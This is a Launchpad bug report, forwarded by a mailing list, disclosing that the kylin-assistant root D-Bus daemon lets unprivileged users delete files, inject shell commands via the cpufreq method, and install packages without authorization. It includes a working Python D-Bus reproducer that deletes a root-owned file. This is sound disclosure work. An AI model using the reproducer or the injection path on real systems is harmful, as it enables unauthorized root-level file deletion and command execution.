Public bug reported:

Summary
=======

The kylin-assistant system D-Bus daemon runs as root, but its D-Bus policy 
permits
unprivileged local users to call privileged methods. Several exported methods do
not authenticate or authorize the caller with polkit or an equivalent mechanism.

The following issues were identified:

1. delete_file(path) deletes a caller-selected file as root. This was reproduced
   with an unprivileged user by deleting a root-owned test file in /var/tmp that
   the user could not delete directly.
2. adjust_cpufreq_scaling_governer(value) constructs a shell command from the
   caller-controlled value and executes it with os.system() as root. Source 
review
   shows a root command-injection path when a cpufreq scaling_governor node is
   present. The tested virtual machine did not expose such a node, so this path
   was not dynamically verified there.
3. install(pkg) accepts a caller-selected package name and starts an apt install
   operation as root without authorizing the D-Bus sender. This was identified 
by
   source review and was not used to install an untrusted package during 
testing.

An unprivileged local user therefore appears able to compromise system integrity
and, on systems exposing cpufreq nodes, execute arbitrary commands as root.

Test environment
================

* Ubuntu Kylin based on Ubuntu 26.04, UKUI desktop
* amd64 virtual machine, 4 vCPUs and 4 GiB RAM
* Linux kernel 7.0.0
* Unprivileged user test, uid 1000, with no sudo or root credentials
* Distribution-provided python3 and python3-dbus

Steps to reproduce the verified arbitrary-file-deletion issue
==============================================================

Use only a disposable test file. First, an administrator creates a root-
owned file:

    sudo sh -c 'printf "test only\n" > /var/tmp/kylin-assistant-test'
    sudo chown root:root /var/tmp/kylin-assistant-test
    sudo chmod 0600 /var/tmp/kylin-assistant-test

Then log in as an unprivileged user without sudo privileges and confirm that a
direct deletion fails:

    rm /var/tmp/kylin-assistant-test
    # Expected from rm: Operation not permitted

As the same unprivileged user, run this minimal reproducer:

    python3 - <<'PY'
    import dbus

    bus = dbus.SystemBus()
    obj = bus.get_object(
        "com.kylin.assistant.systemdaemon",
        "/com/kylin/assistant/systemdaemon",
        introspect=False,
    )
    daemon = dbus.Interface(obj, "com.kylin.assistant.systemdaemon")
    print(daemon.delete_file("/var/tmp/kylin-assistant-test"))
    PY

Finally, check the test file:

    ls -l /var/tmp/kylin-assistant-test

Actual result
=============

The D-Bus call succeeds and returns true. The root-owned test file is removed,
although the calling user cannot remove it directly. The backend process is
running as root:

    root  /usr/bin/python3 /usr/bin/kylin-assistant-backend.py

Observed output from the original reproduction included:

    rm: cannot remove '/var/tmp/asst_victim': Operation not permitted
    get_system_daemon()      -> SystemDaemon
    delete_file(root victim) -> 1
    ls: cannot access '/var/tmp/asst_victim': No such file or directory

Expected result
===============

The daemon must reject privileged method calls from an unauthorized local user.
Deleting files, changing CPU policy, or installing packages should require an
explicit authorization decision based on the real D-Bus sender.

** Affects: youker-assistant (Ubuntu)
     Importance: Undecided
         Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/2160486

Title:
  kylin-assistant system D-Bus daemon exposes unauthenticated privileged
  methods to local users

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/youker-assistant/+bug/2160486/+subscriptions


-- 
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

Reply via email to